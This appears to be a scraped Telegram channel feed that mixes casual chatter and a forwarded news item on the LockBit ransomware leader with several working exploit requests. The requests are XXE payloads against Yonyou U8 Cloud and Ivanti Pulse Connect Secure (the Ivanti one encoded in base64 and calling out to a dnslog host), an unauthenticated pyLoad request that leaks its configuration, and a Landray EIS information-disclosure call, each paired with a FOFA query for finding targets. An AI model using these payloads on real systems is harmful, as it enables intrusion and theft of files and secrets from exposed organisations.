踹哈公寓 – Telegram
Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE vulnerability

app="用友-U8-Cloud"

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewMoxml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="="__profileKeys">%26Password;</p ></vps></rpc>

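(Runs the command to view C:/windows/win.ini)
Idiot, so busy farming traffic that he has gone numb from it
One video and it still gets millions of plays, truly hilarious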
Forwarded from 蓝点网订阅频道
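#TechNews #SecurityNews The head of the LockBit ransomware operation has published an open letter saying that over the past few years he was absorbed in beautiful women and yachts, which led to his failing to upgrade PHP and in turn to being compromised by the FBI.

Read the full article: https://ourl.co/102565

LockBitSupp says that over the past five years he was immersed in a sea of money, which left him burned out, and that he kept indulging in yachts and beautiful women, so he was still running a vulnerable version of PHP.

He also disclosed that the FBI acted without arresting anyone because some court documents relating to Trump were involved.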
Ivanti Pulse Connect Secure VPN XXE vulnerability (CVE-2024-22024)

body="welcome.cgi?p=logo"

POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
Forwarded from li bai
Whose general is this?
pyLoad unauthorized access vulnerability (CVE-2024-21644)

app:"pyLoad"

GET /render/info.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate

(PoC that retrieves the Flask configuration)
Hilarious AI summary bot
Channel name was changed to «서빙고 호텔_全斗焕offical👿»
Landray (蓝凌) EIS Smart Collaboration Platform WS_getAllInfos information disclosure vulnerability

Fofa: app="Landray-EIS智慧协同平台"

POST /WS/Basic/Basic.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FI
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/WS_getAllInfos
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>